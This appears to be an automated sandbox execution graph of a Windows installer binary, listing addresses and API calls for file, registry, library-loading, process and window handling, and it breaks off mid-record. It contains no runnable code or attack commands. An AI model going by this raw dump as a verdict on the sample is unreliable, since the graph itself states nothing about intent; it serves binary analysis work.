                                                                                                                                                  execution_graph 4343 402fc0 4344 401446 18 API calls 4343->4344 4345 402fc7 4344->4345 4346 403017 4345->4346 4347 40300a 4345->4347 4350 401a13 4345->4350 4348 406805 18 API calls 4346->4348 4349 401446 18 API calls 4347->4349 4348->4350 4349->4350 4351 4023c1 4352 40145c 18 API calls 4351->4352 4353 4023c8 4352->4353 4356 40726a 4353->4356 4359 406ed2 CreateFileW 4356->4359 4360 406f04 4359->4360 4361 406f1e ReadFile 4359->4361 4362 4062a3 11 API calls 4360->4362 4363 4023d6 4361->4363 4366 406f84 4361->4366 4362->4363 4364 4071e3 CloseHandle 4364->4363 4365 406f9b ReadFile lstrcpynA lstrcmpA 4365->4366 4367 406fe2 SetFilePointer ReadFile 4365->4367 4366->4363 4366->4364 4366->4365 4370 406fdd 4366->4370 4367->4364 4368 4070a8 ReadFile 4367->4368 4369 407138 4368->4369 4369->4368 4369->4370 4371 40715f SetFilePointer GlobalAlloc ReadFile 4369->4371 4370->4364 4372 4071a3 4371->4372 4373 4071bf lstrcpynW GlobalFree 4371->4373 4372->4372 4372->4373 4373->4364 4374 401cc3 4375 40145c 18 API calls 4374->4375 4376 401cca lstrlenW 4375->4376 4377 4030dc 4376->4377 4378 4030e3 4377->4378 4380 405f51 wsprintfW 4377->4380 4380->4378 4395 401c46 4396 40145c 18 API calls 4395->4396 4397 401c4c 4396->4397 4398 4062a3 11 API calls 4397->4398 4399 401c59 4398->4399 4400 406c9b 81 API calls 4399->4400 4401 401c64 4400->4401 4402 403049 4403 401446 18 API calls 4402->4403 4406 403050 4403->4406 4404 406805 18 API calls 4405 401a13 4404->4405 4406->4404 4406->4405 4407 40204a 4408 401446 18 API calls 4407->4408 4409 402051 IsWindow 4408->4409 4410 4018d3 4409->4410 4411 40324c 4412 403277 4411->4412 4413 40325e SetTimer 4411->4413 4414 4032cc 4412->4414 4415 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4412->4415 4413->4412 4415->4414 4416 4048cc 4417 4048f1 4416->4417 4418 4048da 4416->4418 4420 4048ff IsWindowVisible 4417->4420 4424 404916 4417->4424 4419 4048e0 4418->4419 4434 40495a 4418->4434 4421 403daf SendMessageW 4419->4421 4423 40490c 4420->4423 4420->4434 4425 4048ea 4421->4425 4422 404960 CallWindowProcW 4422->4425 4435 40484e SendMessageW 4423->4435 4424->4422 4440 406009 lstrcpynW 4424->4440 4428 404945 4441 405f51 wsprintfW 4428->4441 4430 40494c 4431 40141d 80 API calls 4430->4431 4432 404953 4431->4432 4442 406009 lstrcpynW 4432->4442 4434->4422 4436 404871 GetMessagePos ScreenToClient SendMessageW 4435->4436 4437 4048ab SendMessageW 4435->4437 4438 4048a3 4436->4438 4439 4048a8 4436->4439 4437->4438 4438->4424 4439->4437 4440->4428 4441->4430 4442->4434 4443 4022cc 4444 40145c 18 API calls 4443->4444 4445 4022d3 4444->4445 4446 4062d5 2 API calls 4445->4446 4447 4022d9 4446->4447 4448 4022e8 4447->4448 4452 405f51 wsprintfW 4447->4452 4451 4030e3 4448->4451 4453 405f51 wsprintfW 4448->4453 4452->4448 4453->4451 4223 4050cd 4224 405295 4223->4224 4225 4050ee GetDlgItem GetDlgItem GetDlgItem 4223->4225 4226 4052c6 4224->4226 4227 40529e GetDlgItem CreateThread CloseHandle 4224->4227 4272 403d98 SendMessageW 4225->4272 4229 4052f4 4226->4229 4231 4052e0 ShowWindow ShowWindow 4226->4231 4232 405316 4226->4232 4227->4226 4275 405047 83 API calls 4227->4275 4233 405352 4229->4233 4235 405305 4229->4235 4236 40532b ShowWindow 4229->4236 4230 405162 4243 406805 18 API calls 4230->4243 4274 403d98 SendMessageW 4231->4274 4237 403dca 8 API calls 4232->4237 4233->4232 4238 40535d SendMessageW 4233->4238 4239 403d18 SendMessageW 4235->4239 4241 40534b 4236->4241 4242 40533d 4236->4242 4240 40528e 4237->4240 4238->4240 4245 405376 CreatePopupMenu 4238->4245 4239->4232 4244 403d18 SendMessageW 4241->4244 4246 404f72 25 API calls 4242->4246 4247 405181 4243->4247 4244->4233 4248 406805 18 API calls 4245->4248 4246->4241 4249 4062a3 11 API calls 4247->4249 4251 405386 AppendMenuW 4248->4251 4250 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4249->4250 4252 4051f3 4250->4252 4253 4051d7 SendMessageW SendMessageW 4250->4253 4254 405399 GetWindowRect 4251->4254 4255 4053ac 4251->4255 4256 405206 4252->4256 4257 4051f8 SendMessageW 4252->4257 4253->4252 4258 4053b3 TrackPopupMenu 4254->4258 4255->4258 4259 403d3f 19 API calls 4256->4259 4257->4256 4258->4240 4260 4053d1 4258->4260 4261 405216 4259->4261 4262 4053ed SendMessageW 4260->4262 4263 405253 GetDlgItem SendMessageW 4261->4263 4264 40521f ShowWindow 4261->4264 4262->4262 4265 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4262->4265 4263->4240 4268 405276 SendMessageW SendMessageW 4263->4268 4266 405242 4264->4266 4267 405235 ShowWindow 4264->4267 4269 40542f SendMessageW 4265->4269 4273 403d98 SendMessageW 4266->4273 4267->4266 4268->4240 4269->4269 4270 40545a GlobalUnlock SetClipboardData CloseClipboard 4269->4270 4270->4240 4272->4230 4273->4263 4274->4229 4454 4030cf 4455 40145c 18 API calls 4454->4455 4456 4030d6 4455->4456 4458 4030dc 4456->4458 4461 4063ac GlobalAlloc lstrlenW 4456->4461 4459 4030e3 4458->4459 4488 405f51 wsprintfW 4458->4488 4462 4063e2 4461->4462 4463 406434 4461->4463 4464 40640f GetVersionExW 4462->4464 4489 40602b CharUpperW 4462->4489 4463->4458 4464->4463 4465 40643e 4464->4465 4466 406464 LoadLibraryA 4465->4466 4467 40644d 4465->4467 4466->4463 4470 406482 GetProcAddress GetProcAddress GetProcAddress 4466->4470 4467->4463 4469 406585 GlobalFree 4467->4469 4471 40659b LoadLibraryA 4469->4471 4472 4066dd FreeLibrary 4469->4472 4475 4064aa 4470->4475 4478 4065f5 4470->4478 4471->4463 4474 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4471->4474 4472->4463 4473 406651 FreeLibrary 4482 40662a 4473->4482 4474->4478 4476 4064ce FreeLibrary GlobalFree 4475->4476 4475->4478 4484 4064ea 4475->4484 4476->4463 4477 4066ea 4480 4066ef CloseHandle FreeLibrary 4477->4480 4478->4473 4478->4482 4479 4064fc lstrcpyW OpenProcess 4481 40654f CloseHandle CharUpperW lstrcmpW 4479->4481 4479->4484 4483 406704 CloseHandle 4480->4483 4481->4478 4481->4484 4482->4477 4485 406685 lstrcmpW 4482->4485 4486 4066b6 CloseHandle 4482->4486 4487 4066d4 CloseHandle 4482->4487 4483->4480 4484->4469 4484->4479 4484->4481 4485->4482 4485->4483 4486->4482 4487->4472 4488->4459 4489->4462 4490 407752 4494 407344 4490->4494 4491 407c6d 4492 4073c2 GlobalFree 4493 4073cb GlobalAlloc 4492->4493 4493->4491 4493->4494 4494->4491 4494->4492 4494->4493 4494->4494 4495 407443 GlobalAlloc 4494->4495 4496 40743a GlobalFree 4494->4496 4495->4491 4495->4494 4496->4495 4497 401dd3 4498 401446 18 API calls 4497->4498 4499 401dda 4498->4499 4500 401446 18 API calls 4499->4500 4501 4018d3 4500->4501 4509 402e55 4510 40145c 18 API calls 4509->4510 4511 402e63 4510->4511 4512 402e79 4511->4512 4513 40145c 18 API calls 4511->4513 4514 405e30 2 API calls 4512->4514 4513->4512 4515 402e7f 4514->4515 4539 405e50 GetFileAttributesW CreateFileW 4515->4539 4517 402e8c 4518 402f35 4517->4518 4519 402e98 GlobalAlloc 4517->4519 4522 4062a3 11 API calls 4518->4522 4520 402eb1 4519->4520 4521 402f2c CloseHandle 4519->4521 4540 403368 SetFilePointer 4520->4540 4521->4518 4524 402f45 4522->4524 4526 402f50 DeleteFileW 4524->4526 4527 402f63 4524->4527 4525 402eb7 4529 403336 ReadFile 4525->4529 4526->4527 4541 401435 4527->4541 4530 402ec0 GlobalAlloc 4529->4530 4531 402ed0 4530->4531 4532 402f04 WriteFile GlobalFree 4530->4532 4533 40337f 37 API calls 4531->4533 4534 40337f 37 API calls 4532->4534 4538 402edd 4533->4538 4535 402f29 4534->4535 4535->4521 4537 402efb GlobalFree 4537->4532 4538->4537 4539->4517 4540->4525 4542 404f72 25 API calls 4541->4542 4543 401443 4542->4543 4544 401cd5 4545 401446 18 API calls 4544->4545 4546 401cdd 4545->4546 4547 401446 18 API calls 4546->4547 4548 401ce8 4547->4548 4549 40145c 18 API calls 4548->4549 4550 401cf1 4549->4550 4551 401d07 lstrlenW 4550->4551 4552 401d43 4550->4552 4553 401d11 4551->4553 4553->4552 4557 406009 lstrcpynW 4553->4557 4555 401d2c 4555->4552 4556 401d39 lstrlenW 4555->4556 4556->4552 4557->4555 4558 403cd6 4559 403ce1 4558->4559 4560 403ce5 4559->4560 4561 403ce8 GlobalAlloc 4559->4561 4561->4560 4562 402cd7 4563 401446 18 API calls 4562->4563 4566 402c64 4563->4566 4564 402d99 4565 402d17 ReadFile 4565->4566 4566->4562 4566->4564 4566->4565 4567 402dd8 4568 402ddf 4567->4568 4569 4030e3 4567->4569 4570 402de5 FindClose 4568->4570 4570->4569 4571 401d5c 4572 40145c 18 API calls 4571->4572 4573 401d63 4572->4573 4574 40145c 18 API calls 4573->4574 4575 401d6c 4574->4575 4576 401d73 lstrcmpiW 4575->4576 4577 401d86 lstrcmpW 4575->4577 4578 401d79 4576->4578 4577->4578 4579 401c99 4577->4579 4578->4577 4578->4579 4281 407c5f 4282 407344 4281->4282 4283 4073c2 GlobalFree 4282->4283 4284 4073cb GlobalAlloc 4282->4284 4285 407c6d 4282->4285 4286 407443 GlobalAlloc 4282->4286 4287 40743a GlobalFree 4282->4287 4283->4284 4284->4282 4284->4285 4286->4282 4286->4285 4287->4286 4580 404363 4581 404373 4580->4581 4582 40439c 4580->4582 4584 403d3f 19 API calls 4581->4584 4583 403dca 8 API calls 4582->4583 4585 4043a8 4583->4585 4586 404380 SetDlgItemTextW 4584->4586 4586->4582 4587 4027e3 4588 4027e9 4587->4588 4589 4027f2 4588->4589 4590 402836 4588->4590 4603 401553 4589->4603 4591 40145c 18 API calls 4590->4591 4593 40283d 4591->4593 4595 4062a3 11 API calls 4593->4595 4594 4027f9 4596 40145c 18 API calls 4594->4596 4601 401a13 4594->4601 4597 40284d 4595->4597 4598 40280a RegDeleteValueW 4596->4598 4607 40149d RegOpenKeyExW 4597->4607 4599 4062a3 11 API calls 4598->4599 4602 40282a RegCloseKey 4599->4602 4602->4601 4604 401563 4603->4604 4605 40145c 18 API calls 4604->4605 4606 401589 RegOpenKeyExW 4605->4606 4606->4594 4613 401515 4607->4613 4615 4014c9 4607->4615 4608 4014ef RegEnumKeyW 4609 401501 RegCloseKey 4608->4609 4608->4615 4610 4062fc 3 API calls 4609->4610 4612 401511 4610->4612 4611 401526 RegCloseKey 4611->4613 4612->4613 4616 401541 RegDeleteKeyW 4612->4616 4613->4601 4614 40149d 3 API calls 4614->4615 4615->4608 4615->4609 4615->4611 4615->4614 4616->4613 4617 403f64 4618 403f90 4617->4618 4619 403f74 4617->4619 4621 403fc3 4618->4621 4622 403f96 SHGetPathFromIDListW 4618->4622 4628 405c84 GetDlgItemTextW 4619->4628 4624 403fad SendMessageW 4622->4624 4625 403fa6 4622->4625 4623 403f81 SendMessageW 4623->4618 4624->4621 4626 40141d 80 API calls 4625->4626 4626->4624 4628->4623 4629 402ae4 4630 402aeb 4629->4630 4631 4030e3 4629->4631 4632 402af2 CloseHandle 4630->4632 4632->4631 4633 402065 4634 401446 18 API calls 4633->4634 4635 40206d 4634->4635 4636 401446 18 API calls 4635->4636 4637 402076 GetDlgItem 4636->4637 4638 4030dc 4637->4638 4639 4030e3 4638->4639 4641 405f51 wsprintfW 4638->4641 4641->4639 4642 402665 4643 40145c 18 API calls 4642->4643 4644 40266b 4643->4644 4645 40145c 18 API calls 4644->4645 4646 402674 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40267d 4647->4648 4649 4062a3 11 API calls 4648->4649 4650 40268c 4649->4650 4651 4062d5 2 API calls 4650->4651 4652 402695 4651->4652 4653 4026a6 lstrlenW lstrlenW 4652->4653 4654 404f72 25 API calls 4652->4654 4657 4030e3 4652->4657 4655 404f72 25 API calls 4653->4655 4654->4652 4656 4026e8 SHFileOperationW 4655->4656 4656->4652 4656->4657 4665 401c69 4666 40145c 18 API calls 4665->4666 4667 401c70 4666->4667 4668 4062a3 11 API calls 4667->4668 4669 401c80 4668->4669 4670 405ca0 MessageBoxIndirectW 4669->4670 4671 401a13 4670->4671 4679 402f6e 4680 402f72 4679->4680 4681 402fae 4679->4681 4682 4062a3 11 API calls 4680->4682 4683 40145c 18 API calls 4681->4683 4684 402f7d 4682->4684 4689 402f9d 4683->4689 4685 4062a3 11 API calls 4684->4685 4686 402f90 4685->4686 4687 402fa2 4686->4687 4688 402f98 4686->4688 4691 4060e7 9 API calls 4687->4691 4690 403e74 5 API calls 4688->4690 4690->4689 4691->4689 4692 4023f0 4693 402403 4692->4693 4694 4024da 4692->4694 4695 40145c 18 API calls 4693->4695 4696 404f72 25 API calls 4694->4696 4697 40240a 4695->4697 4702 4024f1 4696->4702 4698 40145c 18 API calls 4697->4698 4699 402413 4698->4699 4700 402429 LoadLibraryExW 4699->4700 4701 40241b GetModuleHandleW 4699->4701 4703 40243e 4700->4703 4704 4024ce 4700->4704 4701->4700 4701->4703 4716 406365 GlobalAlloc WideCharToMultiByte 4703->4716 4705 404f72 25 API calls 4704->4705 4705->4694 4707 402449 4708 40248c 4707->4708 4709 40244f 4707->4709 4710 404f72 25 API calls 4708->4710 4712 401435 25 API calls 4709->4712 4714 40245f 4709->4714 4711 402496 4710->4711 4713 4062a3 11 API calls 4711->4713 4712->4714 4713->4714 4714->4702 4715 4024c0 FreeLibrary 4714->4715 4715->4702 4717 406390 GetProcAddress 4716->4717 4718 40639d GlobalFree 4716->4718 4717->4718 4718->4707 4719 402df3 4720 402dfa 4719->4720 4722 4019ec 4719->4722 4721 402e07 FindNextFileW 4720->4721 4721->4722 4723 402e16 4721->4723 4725 406009 lstrcpynW 4723->4725 4725->4722 4078 402175 4079 401446 18 API calls 4078->4079 4080 40217c 4079->4080 4081 401446 18 API calls 4080->4081 4082 402186 4081->4082 4083 4062a3 11 API calls 4082->4083 4087 402197 4082->4087 4083->4087 4084 4021aa EnableWindow 4086 4030e3 4084->4086 4085 40219f ShowWindow 4085->4086 4087->4084 4087->4085 4733 404077 4734 404081 4733->4734 4735 404084 lstrcpynW lstrlenW 4733->4735 4734->4735 4104 405479 4105 405491 4104->4105 4106 4055cd 4104->4106 4105->4106 4107 40549d 4105->4107 4108 40561e 4106->4108 4109 4055de GetDlgItem GetDlgItem 4106->4109 4110 4054a8 SetWindowPos 4107->4110 4111 4054bb 4107->4111 4113 405678 4108->4113 4121 40139d 80 API calls 4108->4121 4112 403d3f 19 API calls 4109->4112 4110->4111 4115 4054c0 ShowWindow 4111->4115 4116 4054d8 4111->4116 4117 405608 SetClassLongW 4112->4117 4114 403daf SendMessageW 4113->4114 4134 4055c8 4113->4134 4144 40568a 4114->4144 4115->4116 4118 4054e0 DestroyWindow 4116->4118 4119 4054fa 4116->4119 4120 40141d 80 API calls 4117->4120 4173 4058dc 4118->4173 4122 405510 4119->4122 4123 4054ff SetWindowLongW 4119->4123 4120->4108 4124 405650 4121->4124 4127 4055b9 4122->4127 4128 40551c GetDlgItem 4122->4128 4123->4134 4124->4113 4129 405654 SendMessageW 4124->4129 4125 40141d 80 API calls 4125->4144 4126 4058de DestroyWindow KiUserCallbackDispatcher 4126->4173 4183 403dca 4127->4183 4132 40554c 4128->4132 4133 40552f SendMessageW IsWindowEnabled 4128->4133 4129->4134 4131 40590d ShowWindow 4131->4134 4136 405559 4132->4136 4137 4055a0 SendMessageW 4132->4137 4138 40556c 4132->4138 4147 405551 4132->4147 4133->4132 4133->4134 4135 406805 18 API calls 4135->4144 4136->4137 4136->4147 4137->4127 4141 405574 4138->4141 4142 405589 4138->4142 4140 403d3f 19 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4146 40141d 80 API calls 4142->4146 4143 405587 4143->4127 4144->4125 4144->4126 4144->4134 4144->4135 4144->4140 4164 40581e DestroyWindow 4144->4164 4174 403d3f 4144->4174 4145->4147 4148 405590 4146->4148 4180 403d18 4147->4180 4148->4127 4148->4147 4150 405705 GetDlgItem 4151 405723 ShowWindow KiUserCallbackDispatcher 4150->4151 4152 40571a 4150->4152 4177 403d85 KiUserCallbackDispatcher 4151->4177 4152->4151 4154 40574d EnableWindow 4157 405761 4154->4157 4155 405766 GetSystemMenu EnableMenuItem SendMessageW 4156 405796 SendMessageW 4155->4156 4155->4157 4156->4157 4157->4155 4178 403d98 SendMessageW 4157->4178 4179 406009 lstrcpynW 4157->4179 4160 4057c4 lstrlenW 4161 406805 18 API calls 4160->4161 4162 4057da SetWindowTextW 4161->4162 4163 40139d 80 API calls 4162->4163 4163->4144 4165 405838 CreateDialogParamW 4164->4165 4164->4173 4166 40586b 4165->4166 4165->4173 4167 403d3f 19 API calls 4166->4167 4168 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4167->4168 4169 40139d 80 API calls 4168->4169 4170 4058bc 4169->4170 4170->4134 4171 4058c4 ShowWindow 4170->4171 4172 403daf SendMessageW 4171->4172 4172->4173 4173->4131 4173->4134 4175 406805 18 API calls 4174->4175 4176 403d4a SetDlgItemTextW 4175->4176 4176->4150 4177->4154 4178->4157 4179->4160 4181 403d25 SendMessageW 4180->4181 4182 403d1f 4180->4182 4181->4143 4182->4181 4184 403ddf GetWindowLongW 4183->4184 4194 403e68 4183->4194 4185 403df0 4184->4185 4184->4194 4186 403e02 4185->4186 4187 403dff GetSysColor 4185->4187 4188 403e12 SetBkMode 4186->4188 4189 403e08 SetTextColor 4186->4189 4187->4186 4190 403e30 4188->4190 4191 403e2a GetSysColor 4188->4191 4189->4188 4192 403e41 4190->4192 4193 403e37 SetBkColor 4190->4193 4191->4190 4192->4194 4195 403e54 DeleteObject 4192->4195 4196 403e5b CreateBrushIndirect 4192->4196 4193->4192 4194->4134 4195->4196 4196->4194 4736 4020f9 GetDC GetDeviceCaps 4737 401446 18 API calls 4736->4737 4738 402116 MulDiv 4737->4738 4739 401446 18 API calls 4738->4739 4740 40212c 4739->4740 4741 406805 18 API calls 4740->4741 4742 402165 CreateFontIndirectW 4741->4742 4743 4030dc 4742->4743 4744 4030e3 4743->4744 4746 405f51 wsprintfW 4743->4746 4746->4744 4747 4024fb 4748 40145c 18 API calls 4747->4748 4749 402502 4748->4749 4750 40145c 18 API calls 4749->4750 4751 40250c 4750->4751 4752 40145c 18 API calls 4751->4752 4753 402515 4752->4753 4754 40145c 18 API calls 4753->4754 4755 40251f 4754->4755 4756 40145c 18 API calls 4755->4756 4757 402529 4756->4757 4758 40253d 4757->4758 4759 40145c 18 API calls 4757->4759 4760 4062a3 11 API calls 4758->4760 4759->4758 4761 40256a CoCreateInstance 4760->4761 4762 40258c 4761->4762 4763 40497c GetDlgItem GetDlgItem 4764 4049d2 7 API calls 4763->4764 4769 404bea 4763->4769 4765 404a76 DeleteObject 4764->4765 4766 404a6a SendMessageW 4764->4766 4767 404a81 4765->4767 4766->4765 4770 404ab8 4767->4770 4772 406805 18 API calls 4767->4772 4768 404ccf 4771 404d74 4768->4771 4776 404bdd 4768->4776 4781 404d1e SendMessageW 4768->4781 4769->4768 4779 40484e 5 API calls 4769->4779 4792 404c5a 4769->4792 4775 403d3f 19 API calls 4770->4775 4773 404d89 4771->4773 4774 404d7d SendMessageW 4771->4774 4778 404a9a SendMessageW SendMessageW 4772->4778 4783 404da2 4773->4783 4784 404d9b ImageList_Destroy 4773->4784 4794 404db2 4773->4794 4774->4773 4780 404acc 4775->4780 4782 403dca 8 API calls 4776->4782 4777 404cc1 SendMessageW 4777->4768 4778->4767 4779->4792 4785 403d3f 19 API calls 4780->4785 4781->4776 4787 404d33 SendMessageW 4781->4787 4788 404f6b 4782->4788 4789 404dab GlobalFree 4783->4789 4783->4794 4784->4783 4790 404add 4785->4790 4786 404f1c 4786->4776 4795 404f31 ShowWindow GetDlgItem ShowWindow 4786->4795 4791 404d46 4787->4791 4789->4794 4793 404baa GetWindowLongW SetWindowLongW 4790->4793 4802 404ba4 4790->4802 4805 404b39 SendMessageW 4790->4805 4806 404b67 SendMessageW 4790->4806 4807 404b7b SendMessageW 4790->4807 4801 404d57 SendMessageW 4791->4801 4792->4768 4792->4777 4796 404bc4 4793->4796 4794->4786 4797 404de4 4794->4797 4800 40141d 80 API calls 4794->4800 4795->4776 4798 404be2 4796->4798 4799 404bca ShowWindow 4796->4799 4810 404e12 SendMessageW 4797->4810 4813 404e28 4797->4813 4815 403d98 SendMessageW 4798->4815 4814 403d98 SendMessageW 4799->4814 4800->4797 4801->4771 4802->4793 4802->4796 4805->4790 4806->4790 4807->4790 4808 404ef3 InvalidateRect 4808->4786 4809 404f09 4808->4809 4816 4043ad 4809->4816 4810->4813 4812 404ea1 SendMessageW SendMessageW 4812->4813 4813->4808 4813->4812 4814->4776 4815->4769 4817 4043cd 4816->4817 4818 406805 18 API calls 4817->4818 4819 40440d 4818->4819 4820 406805 18 API calls 4819->4820 4821 404418 4820->4821 4822 406805 18 API calls 4821->4822 4823 404428 lstrlenW wsprintfW SetDlgItemTextW 4822->4823 4823->4786 4824 4026fc 4825 401ee4 4824->4825 4827 402708 4824->4827 4825->4824 4826 406805 18 API calls 4825->4826 4826->4825 4276 4019fd 4277 40145c 18 API calls 4276->4277 4278 401a04 4277->4278 4279 405e7f 2 API calls 4278->4279 4280 401a0b 4279->4280 4828 4022fd 4829 40145c 18 API calls 4828->4829 4830 402304 GetFileVersionInfoSizeW 4829->4830 4831 40232b GlobalAlloc 4830->4831 4835 4030e3 4830->4835 4832 40233f GetFileVersionInfoW 4831->4832 4831->4835 4833 402350 VerQueryValueW 4832->4833 4834 402381 GlobalFree 4832->4834 4833->4834 4837 402369 4833->4837 4834->4835 4841 405f51 wsprintfW 4837->4841 4839 402375 4842 405f51 wsprintfW 4839->4842 4841->4839 4842->4834 4843 402afd 4844 40145c 18 API calls 4843->4844 4845 402b04 4844->4845 4850 405e50 GetFileAttributesW CreateFileW 4845->4850 4847 402b10 4848 4030e3 4847->4848 4851 405f51 wsprintfW 4847->4851 4850->4847 4851->4848 4852 4029ff 4853 401553 19 API calls 4852->4853 4854 402a09 4853->4854 4855 40145c 18 API calls 4854->4855 4856 402a12 4855->4856 4857 402a1f RegQueryValueExW 4856->4857 4859 401a13 4856->4859 4858 402a3f 4857->4858 4862 402a45 4857->4862 4858->4862 4863 405f51 wsprintfW 4858->4863 4861 4029e4 RegCloseKey 4861->4859 4862->4859 4862->4861 4863->4862 4864 401000 4865 401037 BeginPaint GetClientRect 4864->4865 4866 40100c DefWindowProcW 4864->4866 4868 4010fc 4865->4868 4869 401182 4866->4869 4870 401073 CreateBrushIndirect FillRect DeleteObject 4868->4870 4871 401105 4868->4871 4870->4868 4872 401170 EndPaint 4871->4872 4873 40110b CreateFontIndirectW 4871->4873 4872->4869 4873->4872 4874 40111b 6 API calls 4873->4874 4874->4872 4875 401f80 4876 401446 18 API calls 4875->4876 4877 401f88 4876->4877 4878 401446 18 API calls 4877->4878 4879 401f93 4878->4879 4880 401fa3 4879->4880 4881 40145c 18 API calls 4879->4881 4882 401fb3 4880->4882 4883 40145c 18 API calls 4880->4883 4881->4880 4884 402006 4882->4884 4885 401fbc 4882->4885 4883->4882 4887 40145c 18 API calls 4884->4887 4886 401446 18 API calls 4885->4886 4889 401fc4 4886->4889 4888 40200d 4887->4888 4890 40145c 18 API calls 4888->4890 4891 401446 18 API calls 4889->4891 4892 402016 FindWindowExW 4890->4892 4893 401fce 4891->4893 4897 402036 4892->4897 4894 401ff6 SendMessageW 4893->4894 4895 401fd8 SendMessageTimeoutW 4893->4895 4894->4897 4895->4897 4896 4030e3 4897->4896 4899 405f51 wsprintfW 4897->4899 4899->4896 4900 402880 4901 402884 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028a7 4902->4903 4904 40145c 18 API calls 4903->4904 4905 4028b1 4904->4905 4906 4028ba RegCreateKeyExW 4905->4906 4907 4028e8 4906->4907 4914 4029ef 4906->4914 4908 402934 4907->4908 4909 40145c 18 API calls 4907->4909 4910 402963 4908->4910 4913 401446 18 API calls 4908->4913 4912 4028fc lstrlenW 4909->4912 4911 4029ae RegSetValueExW 4910->4911 4915 40337f 37 API calls 4910->4915 4918 4029c6 RegCloseKey 4911->4918 4919 4029cb 4911->4919 4916 402918 4912->4916 4917 40292a 4912->4917 4920 402947 4913->4920 4921 40297b 4915->4921 4922 4062a3 11 API calls 4916->4922 4923 4062a3 11 API calls 4917->4923 4918->4914 4924 4062a3 11 API calls 4919->4924 4925 4062a3 11 API calls 4920->4925 4931 406224 4921->4931 4927 402922 4922->4927 4923->4908 4924->4918 4925->4910 4927->4911 4930 4062a3 11 API calls 4930->4927 4932 406247 4931->4932 4933 40628a 4932->4933 4934 40625c wsprintfW 4932->4934 4935 402991 4933->4935 4936 406293 lstrcatW 4933->4936 4934->4933 4934->4934 4935->4930 4936->4935 4937 402082 4938 401446 18 API calls 4937->4938 4939 402093 SetWindowLongW 4938->4939 4940 4030e3 4939->4940 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 